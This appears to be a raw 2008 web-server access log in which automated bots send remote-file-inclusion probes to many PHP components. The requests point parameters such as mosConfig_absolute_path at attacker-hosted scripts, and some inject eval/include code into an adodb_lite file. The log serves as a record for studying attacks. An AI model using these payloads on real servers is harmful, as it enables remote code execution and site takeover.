67.192.48.154 - - [19/Aug/2008:09:04:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:53 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:58 -0700] "GET /logs/access_080419.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:58 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:58 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:58 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9927 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:12 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:05:16 -0700] "GET //modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:05:17 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:26 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:28 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9925 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:28 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:29 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:05:30 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9925 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:06:03 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9925 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:06:03 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:06:09 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:06:20 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9927 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [19/Aug/2008:09:07:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.29.70.187 - - [19/Aug/2008:09:07:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
193.6.50.161 - - [19/Aug/2008:09:07:08 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
193.6.50.161 - - [19/Aug/2008:09:07:08 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:07:10 -0700] "GET /logs/access_080209.log/info.php?base_dir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:07:11 -0700] "GET /logs/info.php?base_dir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:07:11 -0700] "GET /info.php?base_dir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:07:20 -0700] "GET /info.php?base_dir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:07:21 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:07:21 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9927 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:07:22 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:07:32 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 225555 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:07:32 -0700] "GET /logs/access_080418.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.31 - - [19/Aug/2008:09:07:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.31 - - [19/Aug/2008:09:07:35 -0700] "GET /bikes/?N=D HTTP/1.1" 200 2735 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:08:17 -0700] "GET /logs/access_080510.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:09:32 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:09:33 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9921 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:09:37 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:09:38 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:09:38 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9934 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:09:46 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:09:46 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:09:47 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:09:55 -0700] "GET /bikes/dteel/2008-05-30/?M=A HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:09:56 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:09:10:10 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:09:10:10 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:09:10:10 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:15 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:24 -0700] "GET /logs/access_080717.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:25 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9942 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:25 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:28 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:28 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9928 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:43 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9942 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:10:51 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:11:01 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:11:02 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9926 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:11:02 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:11:13 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:11:14 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:11:31 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.113.53.6 - - [19/Aug/2008:09:11:42 -0700] "GET /logs/access_080530.log//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:11:43 -0700] "GET /phphtml.php?htmlclass_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [19/Aug/2008:09:11:48 -0700] "GET /logs/access_080601.log//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:12:12 -0700] "GET /logs/access_080725.log/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:12:12 -0700] "GET /errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:12:15 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:12:19 -0700] "GET /list.php?table=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:12:21 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [19/Aug/2008:09:12:26 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paijoe.007gb.com/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:12:28 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:12:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:12:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:12:28 -0700] "GET //?path%5Bdocroot%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 200 9883 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:12:28 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:12:33 -0700] "GET /logs/access_080809.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:12:45 -0700] "GET /logs/access_071013.log HTTP/1.0" 200 46816 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.178 - - [19/Aug/2008:09:12:48 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:12:54 -0700] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.178 - - [19/Aug/2008:09:12:55 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:13:05 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:13:06 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:13:06 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:13:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:13:21 -0700] "GET /logs/access_080226.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:13:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:14:04 -0700] "GET /logs/access_080514.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:14:07 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:14:14 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:14:39 -0700] "GET /logs/access_080415.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:14:43 -0700] "GET /logs/access_080126.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:14:45 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:14:45 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:14:46 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:14:54 -0700] "GET /logs/access_080812.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
80.40.126.44 - - [19/Aug/2008:09:14:54 -0700] "GET /logs/access_080621.log/errors.php?error=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [19/Aug/2008:09:14:55 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [19/Aug/2008:09:14:56 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.251 - - [19/Aug/2008:09:15:13 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:15:14 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.251 - - [19/Aug/2008:09:15:14 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.251 - - [19/Aug/2008:09:15:14 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.251 - - [19/Aug/2008:09:15:14 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:15:32 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:15:32 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
